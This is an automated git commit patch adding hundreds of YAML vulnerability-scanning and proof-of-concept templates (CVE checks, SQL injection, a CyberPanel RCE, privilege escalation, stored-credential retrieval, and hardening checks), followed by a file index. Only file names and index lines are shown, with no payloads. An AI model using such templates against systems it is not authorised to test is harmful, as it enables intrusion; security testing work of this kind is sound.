From 9eb53f8c30a1239dee4a95f1b932afbfe8d4abeb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Oct 2024 12:42:36 +0000 Subject: [PATCH] 20241029 --- date.txt | 2 +- poc.txt | 242 + poc/auth/credential-guard-disabled.yaml | 38 + poc/auth/disable-empty-password.yaml | 24 + poc/auth/disable-root-login.yaml | 23 + poc/auth/get-stored-credentials-cmdkey.yaml | 27 + poc/auth/hide-last-login-information.yaml | 24 + poc/auth/http-preprocessor.yaml | 17 + .../hyperv-enhanced-session-mode-enabled.yaml | 33 + ...limit-maximum-authentication-attempts.yaml | 23 + .../lm-ntlmv1-authentication-enabled.yaml | 32 + poc/auth/max-password-age-too-high.yaml | 30 + poc/auth/minimum-password-age-zero.yaml | 36 + poc/auth/null-session-allowed.yaml | 32 + poc/auth/password-complexity-disabled.yaml | 32 + poc/auth/password-history-size-low.yaml | 32 + .../password-reset-lock-screen-enabled.yaml | 32 + poc/auth/plaintext-passwords-in-memory.yaml | 32 + poc/auth/secret-manager-inuse.yaml | 38 + poc/auth/secret-rotation-enabled.yaml | 58 + poc/auth/secret-rotation-interval.yaml | 58 + poc/auth/secrets-patterns-pii.yaml | 812 +++ poc/auth/secrets-patterns-rules.yaml | 4502 +++++++++++++++++ poc/auth/ssh-key-auth-required.yaml | 23 + poc/auth/webui-login.yaml | 25 + poc/aws/cloudfront-compress-object.yaml | 60 + poc/aws/cloudfront-custom-certificates.yaml | 60 + poc/aws/cloudfront-geo-restriction.yaml | 60 + poc/aws/cloudfront-insecure-protocol.yaml | 60 + poc/aws/cloudfront-integrated-waf.yaml | 66 + poc/aws/cloudfront-logging-disabled.yaml | 60 + poc/aws/cloudfront-origin-shield.yaml | 60 + poc/aws/cloudfront-security-policy.yaml | 64 + poc/aws/cloudfront-traffic-unencrypted.yaml | 60 + poc/aws/cloudfront-viewer-policy.yaml | 60 + poc/config/device-guard-not-configured.yaml | 35 + .../k8s-liveness-probe-not-configured.yaml | 48 + poc/cve/CVE-2014-0160.yaml | 137 + poc/cve/CVE-2016-8735.yaml | 87 + poc/cve/CVE-2017-7525.yaml | 63 + poc/cve/CVE-2019-1003000.yaml | 99 + poc/cve/CVE-2020-15906.yaml | 150 + poc/cve/CVE-2023-27294.yaml | 64 + poc/cve/CVE-2023-33533.yaml | 65 + poc/cve/CVE-2023-34992.yaml | 50 + poc/cve/CVE-2023-43494.yaml | 42 + poc/cve/CVE-2023-46214.yaml | 194 + poc/cve/CVE-2023-49799.yaml | 60 + ...0000-694d94278b136ae533a9c85fde05b877.yaml | 59 + ...0008-4e1fc9966938dc414b06dd519e73122b.yaml | 59 + ...0048-b98a29a036ced771c9bb009b9895710a.yaml | 59 + ...0181-21fdb15695068521f367ac81bba91927.yaml | 59 + ...0184-7530619e6a2cefd5da69227ca41f6b35.yaml | 59 + ...0185-8035ec074be079e96120312271a0f33c.yaml | 59 + ...0226-352293729ca01a23dbb48ef5e92fcf29.yaml | 59 + ...0227-cbeff506f736d2c0744bf4b540fe5582.yaml | 59 + ...0233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml | 59 + ...0266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml | 59 + ...0312-50ebf94b7cedccb9e13dff934ff93b48.yaml | 59 + ...0360-45e78583db6193210a4d94e69731df68.yaml | 59 + ...0436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml | 59 + ...0437-71d2ceb29cd432d59d731bb15deb7062.yaml | 59 + poc/cve/CVE-2024-21520.yaml | 45 + poc/cve/CVE-2024-22120.yaml | 53 + poc/cve/CVE-2024-23108.yaml | 50 + poc/cve/CVE-2024-27130.yaml | 49 + poc/cve/CVE-2024-2928.yaml | 69 + poc/cve/CVE-2024-32877.yaml | 38 + poc/cve/CVE-2024-38653.yaml | 45 + poc/cve/CVE-2024-41468.yaml | 41 + poc/cve/CVE-2024-42640.yaml | 69 + poc/cve/CVE-2024-4320.yaml | 53 + ...4047-1273fc886c0e5f1dea85089a551277e9.yaml | 59 + poc/cve/CVE-2024-45309.yaml | 51 + poc/cve/CVE-2024-4841.yaml | 60 + poc/cve/CVE-2024-5334.yaml | 48 + poc/cve/CVE-2024-6049.yaml | 54 + ...7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml | 59 + poc/cve/CVE-2024-9162.yaml | 59 + poc/cve/CVE-2024-9264.yaml | 92 + ...9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml | 59 + ...9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml | 59 + ...9505-bbf8db303ac965c608b6fcb6b5637bca.yaml | 59 + ...9629-f373fd300647fa035c1852f606cc1e3e.yaml | 59 + ...9933-2395a386aa24a6b2e0af0d7ebb971352.yaml | 59 + "poc/cve/CVE-2024\342\200\22324142.yaml" | 26 + poc/cve/cve-2024-6966.yaml | 42 + poc/default/change-default-port.yaml | 23 + poc/default/k8s-default-namespace-used.yaml | 49 + poc/detect/cyberpanel-detect.yaml | 35 + poc/detect/docker-ports-detection.yaml | 19 + poc/detect/flexmls-detect.yaml | 47 + poc/detect/kaseya-detect.yaml | 27 + poc/detect/localai-detect.yaml | 32 + poc/detect/pghero-detect.yaml | 27 + poc/docker/docker-ports-detection.yaml | 19 + poc/docker/k8s-containers-share-host-ipc.yaml | 48 + poc/docker/k8s-privileged-container.yaml | 53 + poc/docker/k8s-root-container-admission.yaml | 49 + poc/exposed/appspec-yml-disclosure.yaml | 20 +- .../http-matcher-extractor-dy-extractor.yaml | 36 + poc/ftp/allow-unencrypted-ftp.yaml | 32 + poc/ftp/ftp-service-running.yaml | 32 + poc/fuzz/fuzz-headless.yaml | 31 + poc/header/headless-header-status-test.yaml | 24 + poc/http/http-get.yaml | 15 + .../http-matcher-extractor-dy-extractor.yaml | 36 + poc/http/http-preprocessor.yaml | 17 + poc/http/multi-http-var-sharing.yaml | 36 + poc/http/net-https-timeout.yaml | 25 + poc/http/net-https.yaml | 20 + .../nodejs-framework-exceptions.yaml | 32 + ...lert-e7666c2e9949971a8cf15a29d904cf8b.yaml | 59 + poc/nodejs/nodejs-framework-exceptions.yaml | 32 + poc/other/a.yaml | 17 + poc/other/aaaa.yaml | 17 + ...rter-dd5a0e0390a10aa5d721daf54dd2417d.yaml | 59 + poc/other/allow-untrusted-certificates.yaml | 29 + .../anonymous-sam-enumeration-enabled.yaml | 32 + .../anonymous-sid-enumeration-enabled.yaml | 32 + ...odes-967c5b2184718a3fda197f1a2ade7c59.yaml | 59 + poc/other/aspnet-framework-exceptions.yaml | 24 + poc/other/audit-logging-disabled.yaml | 37 + poc/other/audit-logs-not-archived.yaml | 29 + poc/other/auto-logon-enabled.yaml | 32 + .../automatic-windows-updates-disabled.yaml | 32 + .../autoplay-removable-media-enabled.yaml | 32 + poc/other/autorun-scripts-startup-folder.yaml | 33 + ...sion-7d8fb493786dead17199a99ea743ec55.yaml | 59 + poc/other/cname.yaml | 18 + poc/other/code-template-1.yaml | 22 + poc/other/code-template-2.yaml | 21 + poc/other/code-value-share-workflow.yaml | 12 + poc/other/complex-conditions.yaml | 23 + poc/other/conditional-flow.yaml | 23 + poc/other/disable-path-automerge.yaml | 21 + poc/other/display-last-username-enabled.yaml | 32 + poc/other/dns-ns-probe.yaml | 43 + .../download-unsigned-activex-allowed.yaml | 32 + poc/other/evaluate-variables.yaml | 30 + ...ntor-a72af3b32854656a4c8be56907be5fd5.yaml | 59 + poc/other/exported-response-vars.yaml | 26 + ...izer-24cbdfd1a4d8ff126da4bd032282a39c.yaml | 59 + poc/other/flow-hide-matcher.yaml | 29 + poc/other/get-hotfix.yaml | 27 + poc/other/guest-account-enabled.yaml | 32 + poc/other/headless-1.yaml | 15 + poc/other/headless-self-contained.yaml | 20 + poc/other/headless-waitevent.yaml | 24 + poc/other/idle-timeout-Interval.yaml | 26 + poc/other/insecure-cipher-suites-enabled.yaml | 33 + poc/other/interactsh-requests-mc-and.yaml | 27 + poc/other/iterate-one-value-flow.yaml | 37 + .../k8s-allow-privilege-escalation-set.yaml | 51 + poc/other/k8s-cpu-limits-not-set.yaml | 50 + poc/other/k8s-cpu-requests-not-set.yaml | 50 + .../k8s-host-network-namespace-shared.yaml | 48 + poc/other/k8s-host-pid-namespace-sharing.yaml | 48 + poc/other/k8s-host-ports-check.yaml | 51 + poc/other/k8s-image-pull-policy-always.yaml | 49 + poc/other/k8s-image-tag-not-fixed.yaml | 53 + poc/other/k8s-memory-limits-not-set.yaml | 48 + poc/other/k8s-memory-requests-not-set.yaml | 48 + .../k8s-minimize-added-capabilities.yaml | 52 + poc/other/k8s-netpol-egress-rules.yaml | 48 + poc/other/k8s-netpol-namespace.yaml | 49 + poc/other/k8s-network-ingress-rules.yaml | 49 + poc/other/k8s-readiness-probe-not-set.yaml | 49 + poc/other/k8s-readonly-fs.yaml | 48 + poc/other/k8s-readonly-rootfs.yaml | 51 + poc/other/k8s-root-user-id.yaml | 50 + poc/other/k8s-seccomp-profile-set.yaml | 54 + ...plus-36c5b8e23edc73cc63396a6195be2274.yaml | 59 + ...stem-2928d4688fb415c9cbca95396899c99f.yaml | 59 + ...stem-91dd199724129d4d681d2379143caddc.yaml | 59 + poc/other/llmnr-disabled.yaml | 33 + poc/other/lm-hash-storage-enabled.yaml | 32 + poc/other/match-3.yaml | 16 + poc/other/matcher-status.yaml | 40 + poc/other/matcher-with-nested-and.yaml | 18 + poc/other/multi-request.yaml | 26 + .../multimatch-value-share-template.yaml | 23 + .../multimatch-value-share-workflow.yaml | 21 + poc/other/multiproto.yaml | 30 + .../multiprotocol-value-share-template.yaml | 22 + poc/other/multiprotodynamic.yaml | 29 + poc/other/multiprotowithprefix.yaml | 26 + poc/other/net-multi-step.yaml | 32 + poc/other/netbios-disabled.yaml | 33 + .../network-discovery-public-enabled.yaml | 32 + poc/other/network-port.yaml | 21 + ...lite-e4e61a63407c312b8137011c7ea6ce20.yaml | 59 + poc/other/ns.yaml | 18 + poc/other/nuclei-flow-dns-prefix.yaml | 40 + ...fier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml | 59 + ...lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml | 59 + ...ntor-90c620c52803efe7bafe8790411d6928.yaml | 59 + poc/other/privesc-agetty.yaml | 41 + poc/other/ps1-snippet.yaml | 28 + poc/other/py-file.yaml | 21 + poc/other/py-interactsh.yaml | 29 + poc/other/py-nosig.yaml | 21 + poc/other/py-snippet.yaml | 23 + poc/other/quivr-panel.yaml | 27 + poc/other/raw-path-single-slash.yaml | 13 + poc/other/raw-unsafe-path-single-slash.yaml | 15 + poc/other/same-address.yaml | 29 + ...seur-710adeba52f1b42ddecb78da2e1d3776.yaml | 59 + poc/other/sf2-profiler-exploit.yaml | 44 + poc/other/show-version-warning.yaml | 18 + poc/other/sns-public-subscribe-access.yaml | 70 + poc/other/stack-notification-disabled.yaml | 58 + poc/other/stack-policy-not-inuse.yaml | 60 + poc/other/stack-termination-disabled.yaml | 58 + ...tion-772ed0ffd8d710c91969af2e2067e767.yaml | 59 + ...tion-49702b84305a29c70a813e1c6c4c5f8d.yaml | 59 + poc/other/tenda-fh451-stack-overflow.yaml | 36 + poc/other/txt.yaml | 18 + poc/other/unquoted-service-pathcheck.yaml | 52 + poc/other/unsigned.yaml | 21 + poc/remote_code_execution/cyberpanel-rce.yaml | 58 + ...0181-21fdb15695068521f367ac81bba91927.yaml | 59 + ...0226-352293729ca01a23dbb48ef5e92fcf29.yaml | 59 + ...0233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml | 59 + ...0360-45e78583db6193210a4d94e69731df68.yaml | 59 + ...7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml | 59 + ...9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml | 59 + ...9505-bbf8db303ac965c608b6fcb6b5637bca.yaml | 59 + ...gram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml | 59 + ...dons-e750f1bb05d811fe0e3f213b39e81dbd.yaml | 59 + .../royal-event-management-system-sqli.yaml | 67 + poc/sql/xhibiter-nft-sqli.yaml | 52 + .../royal-event-management-system-sqli.yaml | 67 + poc/sql_injection/xhibiter-nft-sqli.yaml | 52 + poc/ssh/disable-ssh-forwarding.yaml | 24 + poc/ssh/disable-ssh-protocol-1.yaml | 24 + poc/ssh/enable-ssh-privilege-separation.yaml | 24 + poc/ssh/limit-ssh-group.yaml | 24 + poc/ssh/limit-ssh-users-access.yaml | 24 + poc/ssh/ssh-audit.yaml | 80 + poc/ssh/ssh-ip-whitelist.yaml | 23 + poc/ssh/ssh-key-auth-required.yaml | 23 + poc/web/webui-login.yaml | 25 + ...ages-504d2223497cf2c2514151c40b405179.yaml | 59 + ...ages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml | 59 + 245 files changed, 16125 insertions(+), 4 deletions(-) create mode 100644 poc/auth/credential-guard-disabled.yaml create mode 100644 poc/auth/disable-empty-password.yaml create mode 100644 poc/auth/disable-root-login.yaml create mode 100644 poc/auth/get-stored-credentials-cmdkey.yaml create mode 100644 poc/auth/hide-last-login-information.yaml create mode 100644 poc/auth/http-preprocessor.yaml create mode 100644 poc/auth/hyperv-enhanced-session-mode-enabled.yaml create mode 100644 poc/auth/limit-maximum-authentication-attempts.yaml create mode 100644 poc/auth/lm-ntlmv1-authentication-enabled.yaml create mode 100644 poc/auth/max-password-age-too-high.yaml create mode 100644 poc/auth/minimum-password-age-zero.yaml create mode 100644 poc/auth/null-session-allowed.yaml create mode 100644 poc/auth/password-complexity-disabled.yaml create mode 100644 poc/auth/password-history-size-low.yaml create mode 100644 poc/auth/password-reset-lock-screen-enabled.yaml create mode 100644 poc/auth/plaintext-passwords-in-memory.yaml create mode 100644 poc/auth/secret-manager-inuse.yaml create mode 100644 poc/auth/secret-rotation-enabled.yaml create mode 100644 poc/auth/secret-rotation-interval.yaml create mode 100644 poc/auth/secrets-patterns-pii.yaml create mode 100644 poc/auth/secrets-patterns-rules.yaml create mode 100644 poc/auth/ssh-key-auth-required.yaml create mode 100644 poc/auth/webui-login.yaml create mode 100644 poc/aws/cloudfront-compress-object.yaml create mode 100644 poc/aws/cloudfront-custom-certificates.yaml create mode 100644 poc/aws/cloudfront-geo-restriction.yaml create mode 100644 poc/aws/cloudfront-insecure-protocol.yaml create mode 100644 poc/aws/cloudfront-integrated-waf.yaml create mode 100644 poc/aws/cloudfront-logging-disabled.yaml create mode 100644 poc/aws/cloudfront-origin-shield.yaml create mode 100644 poc/aws/cloudfront-security-policy.yaml create mode 100644 poc/aws/cloudfront-traffic-unencrypted.yaml create mode 100644 poc/aws/cloudfront-viewer-policy.yaml create mode 100644 poc/config/device-guard-not-configured.yaml create mode 100644 poc/config/k8s-liveness-probe-not-configured.yaml create mode 100644 poc/cve/CVE-2014-0160.yaml create mode 100644 poc/cve/CVE-2016-8735.yaml create mode 100644 poc/cve/CVE-2017-7525.yaml create mode 100644 poc/cve/CVE-2019-1003000.yaml create mode 100644 poc/cve/CVE-2020-15906.yaml create mode 100644 poc/cve/CVE-2023-27294.yaml create mode 100644 poc/cve/CVE-2023-33533.yaml create mode 100644 poc/cve/CVE-2023-34992.yaml create mode 100644 poc/cve/CVE-2023-43494.yaml create mode 100644 poc/cve/CVE-2023-46214.yaml create mode 100644 poc/cve/CVE-2023-49799.yaml create mode 100644 poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml create mode 100644 poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml create mode 100644 poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml create mode 100644 poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml create mode 100644 poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml create mode 100644 poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml create mode 100644 poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml create mode 100644 poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml create mode 100644 poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml create mode 100644 poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml create mode 100644 poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml create mode 100644 poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml create mode 100644 poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml create mode 100644 poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml create mode 100644 poc/cve/CVE-2024-21520.yaml create mode 100644 poc/cve/CVE-2024-22120.yaml create mode 100644 poc/cve/CVE-2024-23108.yaml create mode 100644 poc/cve/CVE-2024-27130.yaml create mode 100644 poc/cve/CVE-2024-2928.yaml create mode 100644 poc/cve/CVE-2024-32877.yaml create mode 100644 poc/cve/CVE-2024-38653.yaml create mode 100644 poc/cve/CVE-2024-41468.yaml create mode 100644 poc/cve/CVE-2024-42640.yaml create mode 100644 poc/cve/CVE-2024-4320.yaml create mode 100644 poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml create mode 100644 poc/cve/CVE-2024-45309.yaml create mode 100644 poc/cve/CVE-2024-4841.yaml create mode 100644 poc/cve/CVE-2024-5334.yaml create mode 100644 poc/cve/CVE-2024-6049.yaml create mode 100644 poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml create mode 100644 poc/cve/CVE-2024-9162.yaml create mode 100644 poc/cve/CVE-2024-9264.yaml create mode 100644 poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml create mode 100644 poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml create mode 100644 poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml create mode 100644 poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml create mode 100644 poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml create mode 100644 "poc/cve/CVE-2024\342\200\22324142.yaml" create mode 100644 poc/cve/cve-2024-6966.yaml create mode 100644 poc/default/change-default-port.yaml create mode 100644 poc/default/k8s-default-namespace-used.yaml create mode 100644 poc/detect/cyberpanel-detect.yaml create mode 100644 poc/detect/docker-ports-detection.yaml create mode 100644 poc/detect/flexmls-detect.yaml create mode 100644 poc/detect/kaseya-detect.yaml create mode 100644 poc/detect/localai-detect.yaml create mode 100644 poc/detect/pghero-detect.yaml create mode 100644 poc/docker/docker-ports-detection.yaml create mode 100644 poc/docker/k8s-containers-share-host-ipc.yaml create mode 100644 poc/docker/k8s-privileged-container.yaml create mode 100644 poc/docker/k8s-root-container-admission.yaml create mode 100644 poc/extract/http-matcher-extractor-dy-extractor.yaml create mode 100644 poc/ftp/allow-unencrypted-ftp.yaml create mode 100644 poc/ftp/ftp-service-running.yaml create mode 100644 poc/fuzz/fuzz-headless.yaml create mode 100644 poc/header/headless-header-status-test.yaml create mode 100644 poc/http/http-get.yaml create mode 100644 poc/http/http-matcher-extractor-dy-extractor.yaml create mode 100644 poc/http/http-preprocessor.yaml create mode 100644 poc/http/multi-http-var-sharing.yaml create mode 100644 poc/http/net-https-timeout.yaml create mode 100644 poc/http/net-https.yaml create mode 100644 poc/javascript/nodejs-framework-exceptions.yaml create mode 100644 poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml create mode 100644 poc/nodejs/nodejs-framework-exceptions.yaml create mode 100644 poc/other/a.yaml create mode 100644 poc/other/aaaa.yaml create mode 100644 poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml create mode 100644 poc/other/allow-untrusted-certificates.yaml create mode 100644 poc/other/anonymous-sam-enumeration-enabled.yaml create mode 100644 poc/other/anonymous-sid-enumeration-enabled.yaml create mode 100644 poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml create mode 100644 poc/other/aspnet-framework-exceptions.yaml create mode 100644 poc/other/audit-logging-disabled.yaml create mode 100644 poc/other/audit-logs-not-archived.yaml create mode 100644 poc/other/auto-logon-enabled.yaml create mode 100644 poc/other/automatic-windows-updates-disabled.yaml create mode 100644 poc/other/autoplay-removable-media-enabled.yaml create mode 100644 poc/other/autorun-scripts-startup-folder.yaml create mode 100644 poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml create mode 100644 poc/other/cname.yaml create mode 100644 poc/other/code-template-1.yaml create mode 100644 poc/other/code-template-2.yaml create mode 100644 poc/other/code-value-share-workflow.yaml create mode 100644 poc/other/complex-conditions.yaml create mode 100644 poc/other/conditional-flow.yaml create mode 100644 poc/other/disable-path-automerge.yaml create mode 100644 poc/other/display-last-username-enabled.yaml create mode 100644 poc/other/dns-ns-probe.yaml create mode 100644 poc/other/download-unsigned-activex-allowed.yaml create mode 100644 poc/other/evaluate-variables.yaml create mode 100644 poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml create mode 100644 poc/other/exported-response-vars.yaml create mode 100644 poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml create mode 100644 poc/other/flow-hide-matcher.yaml create mode 100644 poc/other/get-hotfix.yaml create mode 100644 poc/other/guest-account-enabled.yaml create mode 100644 poc/other/headless-1.yaml create mode 100644 poc/other/headless-self-contained.yaml create mode 100644 poc/other/headless-waitevent.yaml create mode 100644 poc/other/idle-timeout-Interval.yaml create mode 100644 poc/other/insecure-cipher-suites-enabled.yaml create mode 100644 poc/other/interactsh-requests-mc-and.yaml create mode 100644 poc/other/iterate-one-value-flow.yaml create mode 100644 poc/other/k8s-allow-privilege-escalation-set.yaml create mode 100644 poc/other/k8s-cpu-limits-not-set.yaml create mode 100644 poc/other/k8s-cpu-requests-not-set.yaml create mode 100644 poc/other/k8s-host-network-namespace-shared.yaml create mode 100644 poc/other/k8s-host-pid-namespace-sharing.yaml create mode 100644 poc/other/k8s-host-ports-check.yaml create mode 100644 poc/other/k8s-image-pull-policy-always.yaml create mode 100644 poc/other/k8s-image-tag-not-fixed.yaml create mode 100644 poc/other/k8s-memory-limits-not-set.yaml create mode 100644 poc/other/k8s-memory-requests-not-set.yaml create mode 100644 poc/other/k8s-minimize-added-capabilities.yaml create mode 100644 poc/other/k8s-netpol-egress-rules.yaml create mode 100644 poc/other/k8s-netpol-namespace.yaml create mode 100644 poc/other/k8s-network-ingress-rules.yaml create mode 100644 poc/other/k8s-readiness-probe-not-set.yaml create mode 100644 poc/other/k8s-readonly-fs.yaml create mode 100644 poc/other/k8s-readonly-rootfs.yaml create mode 100644 poc/other/k8s-root-user-id.yaml create mode 100644 poc/other/k8s-seccomp-profile-set.yaml create mode 100644 poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml create mode 100644 poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml create mode 100644 poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml create mode 100644 poc/other/llmnr-disabled.yaml create mode 100644 poc/other/lm-hash-storage-enabled.yaml create mode 100644 poc/other/match-3.yaml create mode 100644 poc/other/matcher-status.yaml create mode 100644 poc/other/matcher-with-nested-and.yaml create mode 100644 poc/other/multi-request.yaml create mode 100644 poc/other/multimatch-value-share-template.yaml create mode 100644 poc/other/multimatch-value-share-workflow.yaml create mode 100644 poc/other/multiproto.yaml create mode 100644 poc/other/multiprotocol-value-share-template.yaml create mode 100644 poc/other/multiprotodynamic.yaml create mode 100644 poc/other/multiprotowithprefix.yaml create mode 100644 poc/other/net-multi-step.yaml create mode 100644 poc/other/netbios-disabled.yaml create mode 100644 poc/other/network-discovery-public-enabled.yaml create mode 100644 poc/other/network-port.yaml create mode 100644 poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml create mode 100644 poc/other/ns.yaml create mode 100644 poc/other/nuclei-flow-dns-prefix.yaml create mode 100644 poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml create mode 100644 poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml create mode 100644 poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml create mode 100644 poc/other/privesc-agetty.yaml create mode 100644 poc/other/ps1-snippet.yaml create mode 100644 poc/other/py-file.yaml create mode 100644 poc/other/py-interactsh.yaml create mode 100644 poc/other/py-nosig.yaml create mode 100644 poc/other/py-snippet.yaml create mode 100644 poc/other/quivr-panel.yaml create mode 100644 poc/other/raw-path-single-slash.yaml create mode 100644 poc/other/raw-unsafe-path-single-slash.yaml create mode 100644 poc/other/same-address.yaml create mode 100644 poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml create mode 100644 poc/other/sf2-profiler-exploit.yaml create mode 100644 poc/other/show-version-warning.yaml create mode 100644 poc/other/sns-public-subscribe-access.yaml create mode 100644 poc/other/stack-notification-disabled.yaml create mode 100644 poc/other/stack-policy-not-inuse.yaml create mode 100644 poc/other/stack-termination-disabled.yaml create mode 100644 poc/other/streamweasels-kick-integration-772ed0ffd8d710c91969af2e2067e767.yaml create mode 100644 poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml create mode 100644 poc/other/tenda-fh451-stack-overflow.yaml create mode 100644 poc/other/txt.yaml create mode 100644 poc/other/unquoted-service-pathcheck.yaml create mode 100644 poc/other/unsigned.yaml create mode 100644 poc/remote_code_execution/cyberpanel-rce.yaml create mode 100644 poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml create mode 100644 poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml create mode 100644 poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml create mode 100644 poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml create mode 100644 poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml create mode 100644 poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml create mode 100644 poc/sql/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml create mode 100644 poc/sql/cf7-telegram-92fb3b1b9f8249665fe2a2df5db85b7a.yaml create mode 100644 poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml create mode 100644 poc/sql/royal-event-management-system-sqli.yaml create mode 100644 poc/sql/xhibiter-nft-sqli.yaml create mode 100644 poc/sql_injection/royal-event-management-system-sqli.yaml create mode 100644 poc/sql_injection/xhibiter-nft-sqli.yaml create mode 100644 poc/ssh/disable-ssh-forwarding.yaml create mode 100644 poc/ssh/disable-ssh-protocol-1.yaml create mode 100644 poc/ssh/enable-ssh-privilege-separation.yaml create mode 100644 poc/ssh/limit-ssh-group.yaml create mode 100644 poc/ssh/limit-ssh-users-access.yaml create mode 100644 poc/ssh/ssh-audit.yaml create mode 100644 poc/ssh/ssh-ip-whitelist.yaml create mode 100644 poc/ssh/ssh-key-auth-required.yaml create mode 100644 poc/web/webui-login.yaml create mode 100644 poc/wordpress/wpc-smart-messages-504d2223497cf2c2514151c40b405179.yaml create mode 100644 poc/wordpress/wpc-smart-messages-bd63fbb32b56e3848c8cdcc2c3f2fd2f.yaml diff --git a/date.txt b/date.txt index 0dda5574ec..03377a986a 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241028 +20241029 diff --git a/poc.txt b/poc.txt index 57481eabf8..9cc3ae0552 100644 --- a/poc.txt +++ b/poc.txt @@ -2598,6 +2598,7 @@ ./poc/auth/credential-exposure-1251.yaml ./poc/auth/credential-exposure-file.yaml ./poc/auth/credential-exposure.yaml +./poc/auth/credential-guard-disabled.yaml ./poc/auth/credentials (copy 1).yaml ./poc/auth/credentials-1257.yaml ./poc/auth/credentials-1258.yaml @@ -2770,6 +2771,8 @@ ./poc/auth/directadmin-login-panel-7001.yaml ./poc/auth/directadmin-login-panel.yaml ./poc/auth/directum-login.yaml +./poc/auth/disable-empty-password.yaml +./poc/auth/disable-root-login.yaml ./poc/auth/disable-user-login-e081053d3461091ab36b623cc2522dea.yaml ./poc/auth/disable-user-login.yaml ./poc/auth/discord-api-token.yaml @@ -3139,6 +3142,7 @@ ./poc/auth/geoserver-default-login.yaml ./poc/auth/geoserver-login-panel.yaml ./poc/auth/get-access-token-json.yaml +./poc/auth/get-stored-credentials-cmdkey.yaml ./poc/auth/git-credentials-7643.yaml ./poc/auth/git-credentials-7644.yaml ./poc/auth/git-credentials-disclosure-7639.yaml @@ -3349,6 +3353,7 @@ ./poc/auth/hidden-api-key-exposure.yaml ./poc/auth/hidden-cookie-attributes.yaml ./poc/auth/hidden-csrf-token.yaml +./poc/auth/hide-last-login-information.yaml ./poc/auth/hide-login-page-c1c307d2df7d682116006f73d5e737fe.yaml ./poc/auth/hide-login-page.yaml ./poc/auth/hikvision-camera-management-unauthorized-access-user-list.yaml @@ -3413,6 +3418,7 @@ ./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml +./poc/auth/http-preprocessor.yaml ./poc/auth/http-username-password.yaml ./poc/auth/httponly-cookie-detect.yaml ./poc/auth/huawei-HG532e-default-login.yaml @@ -3435,6 +3441,7 @@ ./poc/auth/hue-default-credential.yaml ./poc/auth/hue-login-panel.yaml ./poc/auth/hybris-default-login.yaml +./poc/auth/hyperv-enhanced-session-mode-enabled.yaml ./poc/auth/iam-db-auth.yaml 